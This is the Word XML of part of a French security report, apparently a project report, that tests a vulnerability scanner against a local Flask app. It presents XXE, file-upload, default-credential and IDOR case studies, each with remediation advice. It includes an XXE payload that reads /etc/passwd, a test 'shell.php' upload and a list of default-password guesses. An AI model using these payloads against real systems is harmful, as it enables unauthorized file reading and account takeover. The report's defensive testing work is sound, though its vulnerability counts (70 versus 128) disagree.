        <w:t>3.5.5  Étude de Cas 5 : XXE (OWASP A05) — CVSS 8.2 ÉLEVÉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46DC6B"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http://127.0.0.1:5001/xml   |   Methode : POST   |   Corps : XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882FE4A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'endpoint /xml parse le corps XML de la requête avec un parseur qui autorise le traitement des entités externes (DTD). L'attaquant peut définir une entité externe pointant vers un fichier local pour l'exfiltrer dans la réponse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04623BD2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — XXE Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479DA016"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XML :</w:t>
        <w:br/>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;</w:t>
        <w:br/>
        <w:t>&lt;request&gt;&lt;data&gt;&amp;xxe;&lt;/data&gt;&lt;/request&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>Preuve           : Contenu de /etc/passwd inclus dans la réponse XML</w:t>
        <w:br/>
        <w:t>Score CVSS       : 8.2 — Élevé</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051339B2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Remédiation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Désactiver les entités externes dans le parseur XML (lxml : parser.resolve_entities=False), utiliser defusedxml en Python, préférer JSON quand XML n'est pas strictement nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D992300" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.6  Étude de Cas 6 : Upload de Fichier Malveillant (OWASP A04) — CVSS 8.8 ÉLEVÉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E09FD4"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http://127.0.0.1:5001/upload   |   Méthode : POST   |   Champ : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72603FE9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le scanner génère un fichier PHP avec un marqueur unique (UUID), l'uploade, puis tente d'y accéder via HTTP. Si le marqueur est retourné dans la réponse, cela confirme que le fichier est exécutable (ou au minimum accessible) sur le serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180BAD0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — Unrestricted File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BB06D"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lastRenderedPageBreak/>
        <w:t>Fichier uploadé  : 806a29fb_shell.php (Content-Type: application/x-php)</w:t>
        <w:br/>
        <w:t>Contenu          : &lt;?php echo "MARKER_806a29fb"; ?&gt;</w:t>
        <w:br/>
        <w:t>URL de vérif.    : http://127.0.0.1:5001/uploads/806a29fb_shell.php</w:t>
        <w:br/>
        <w:t>Preuve           : Marqueur 'MARKER_806a29fb' retrouvé dans la réponse HTTP 200</w:t>
        <w:br/>
        <w:t>Score CVSS       : 8.8 — Élevé</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
        <w:br/>
        <w:t>Impact           : Exécution de code arbitraire sur le serveur (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC30F8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Remédiation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Valider l'extension ET les magic bytes côté serveur, utiliser une whitelist d'extensions (.jpg, .png, .pdf uniquement), stocker les uploads hors du webroot, servir les fichiers via un endpoint dédié avec Content-Disposition: attachment, désactiver l'exécution PHP dans le répertoire d'upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEF7F2C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.7  Étude de Cas 7 : Authentification Défaillante (OWASP A07) — CVSS 9.8 CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE962B"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http://127.0.0.1:5001/login   |   Methode : POST   |   Parametres : username, password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03F1FF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le détecteur AuthFailures tente une liste de credentials par défaut (admin:admin, admin:password, root:root, admin:123456, etc.) sur le formulaire de login détecté par le crawler. La réponse est analysée pour détecter les signes de succès (redirection vers un dashboard, disparition du formulaire, token de session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68679F92" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultats — Auth Failures + Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A619F5E"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 username=admin, password=admin</w:t>
        <w:br/>
        <w:t>Preuve           : Identifiants par défaut acceptés — redirection vers /dashboard</w:t>
        <w:br/>
        <w:t>Score CVSS       : 9.8 — Critique</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
        <w:br/>
        <w:br/>
        <w:t>Payload          : HTTP en clair (formulaire password servi en HTTP)</w:t>
        <w:br/>
        <w:t>Preuve           : Champ &lt;input type="password"&gt; détecté sur page HTTP (non HTTPS)</w:t>
        <w:br/>
        <w:t>Score CVSS       : 7.5 — Élevé (Cryptographic Failures A02)</w:t>
        <w:br/>
        <w:t>Impact           : Compromission complète du compte, interception des credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2BD89A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.8  Étude de Cas 8 : IDOR (OWASP A01) — CVSS 6.5 MOYEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332164A9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Cible : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1:5001/user?id=...   |   Paramètre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F83A2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le détecteur IDOR incrémente et décrémente les paramètres numériques (id, user_id, account_id, etc.) et compare les réponses. Si des contenus différents sont retournés pour des IDs différents sans erreur 403, une IDOR est suspectée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B09A855" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — IDOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B8D7D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="AABBCC"/>
          <w:left w:val="single" w:sz="8" w:space="4" w:color="003366"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="AABBCC"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="AABBCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="40" w:after="160"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Payload          : id=1 → id=2 → id=3</w:t>
        <w:br/>
        <w:t>Observation      : Contenu différent retourné pour chaque ID (données d'autres utilisateurs)</w:t>
        <w:br/>
        <w:t>Statut HTTP      : 200 OK pour tous les IDs (aucun contrôle d'accès)</w:t>
        <w:br/>
        <w:t>Score CVSS       : 6.5 — Moyen</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N</w:t>
        <w:br/>
        <w:t>Impact           : Accès aux données personnelles de tous les utilisateurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BFA842"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3.6  Résultats Globaux et Analyse de Couverture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A6E07E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.6.1  Tableau de Bord Complet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF068F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le scan complet de l'application Flask de test (http://127.0.0.1:5001) a produit les résultats suivants : 11 pages crawlées, 6,04 secondes d'exécution totale, 70 vulnérabilités détectées après déduplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB6C0D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Tableau de bord — résultats complets du scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CE8DF" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0699A412" wp14:editId="4F3808DA">
            <wp:extent cx="5029200" cy="2615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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="2615184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E64B0" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 6 — Tableau de bord du rapport HTML : 3 Critique, 7 Élevé, 118 Moyen (128 vulnérabilités détectées)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="4252"/>
        <w:gridCol w:w="1282"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="384F96BF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B499E2F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="324660A5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50F65F2D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Score CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16AE14E5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnérabilités détectées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F645CF9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remédiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="61216EE4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6056F281" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C80000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02A225E5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21946C4E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9.0–10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="560BA2F6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Auth Failures (A07), SQL Injection (A03)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177791CF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 24h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="0AD24308" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5AA7FF9C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="DC7800"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7A05FB41" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5284E8EB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.0–8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4FE86666" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>File Upload(A04), SSRF×2(A10), XXE(A05), Crypto(A02), Path Traversal(A01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="21AD2788" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 7j</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="08146BCF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F624D58" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="B4A000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
